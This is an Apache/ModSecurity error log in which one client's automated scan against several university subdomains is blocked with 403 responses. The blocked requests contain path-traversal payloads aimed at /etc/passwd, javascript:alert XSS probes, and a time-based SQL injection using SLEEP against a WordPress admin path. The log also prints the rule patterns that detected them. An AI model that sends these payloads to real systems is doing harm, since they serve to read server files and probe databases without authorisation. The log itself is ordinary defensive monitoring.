[Tue Aug 29 11:43:49.457126 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAeChgYAAAAw"]
[Tue Aug 29 11:43:49.479786 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hcCo-f0AAAeChgcAAAAw"]
[Tue Aug 29 11:43:50.400674 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hsCo-f0AAAdOeWYAAAAS"]
[Tue Aug 29 11:43:50.401118 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAAdxUZ0AAAAC"]
[Tue Aug 29 11:43:50.408621 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAARphAMAAAAU"]
[Tue Aug 29 11:43:50.419917 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAAc4EssAAAAP"]
[Tue Aug 29 11:43:50.420722 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAAdb7tYAAAAb"]
[Tue Aug 29 11:43:50.424953 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAAfBL2sAAAAI"]
[Tue Aug 29 11:43:50.428268 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAARphAQAAAAU"]
[Tue Aug 29 11:43:50.441345 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAAdxUZ8AAAAC"]
[Tue Aug 29 11:43:50.456574 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAAeChgwAAAAw"]
[Tue Aug 29 11:43:50.459199 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAAdOeWgAAAAS"]
[Tue Aug 29 11:43:50.467691 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAAdxUaAAAAAC"]
[Tue Aug 29 11:43:51.357691 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAAfBL20AAAAI"]
[Tue Aug 29 11:43:51.363429 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAAeX1JsAAAAK"]
[Tue Aug 29 11:43:51.363971 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAAdb7tkAAAAb"]
[Tue Aug 29 11:43:51.364064 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAAdxUaEAAAAC"]
[Tue Aug 29 11:43:51.393570 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAAe8l5IAAAAF"]
[Tue Aug 29 11:43:51.401579 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13h8Co-f0AAAdOeWkAAAAS"]
[Tue Aug 29 11:43:51.425629 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13h8Co-f0AAAdb7tsAAAAb"]
[Tue Aug 29 11:43:52.379253 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13iMCo-f0AAAe8l5UAAAAF"]
[Tue Aug 29 11:43:55.343730 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAfWNzcAAAAL"]
[Tue Aug 29 11:43:55.385709 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAe8l50AAAAF"]
[Tue Aug 29 11:43:55.407188 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAe8l54AAAAF"]
[Tue Aug 29 11:43:55.428795 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAe8l58AAAAF"]
[Tue Aug 29 11:43:55.467757 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAeX1KAAAAAK"]
[Tue Aug 29 11:43:55.644962 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAcsLOUAAAAE"]
[Tue Aug 29 11:43:55.687753 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAARphBIAAAAU"]
[Tue Aug 29 11:43:55.709546 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAe8l6oAAAAF"]
[Tue Aug 29 11:43:55.713314 2023] [:error] [pid 2019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAfjGNcAAAAh"]
[Tue Aug 29 11:43:55.722603 2023] [:error] [pid 2022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAfm6NAAAAAk"]
[Tue Aug 29 11:43:55.763169 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAfEBvsAAAAO"]
[Tue Aug 29 11:43:56.357753 2023] [:error] [pid 2022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jMCo-f0AAAfm6NIAAAAk"]
[Tue Aug 29 11:43:56.368358 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jMCo-f0AAAeChhUAAAAw"]
[Tue Aug 29 11:43:56.369478 2023] [:error] [pid 2019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jMCo-f0AAAfjGNoAAAAh"]
[Tue Aug 29 11:43:56.378609 2023] [:error] [pid 2015] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jMCo-f0AAAfforEAAAAd"]
[Tue Aug 29 11:43:56.381118 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jMCo-f0AAAfky7oAAAAi"]
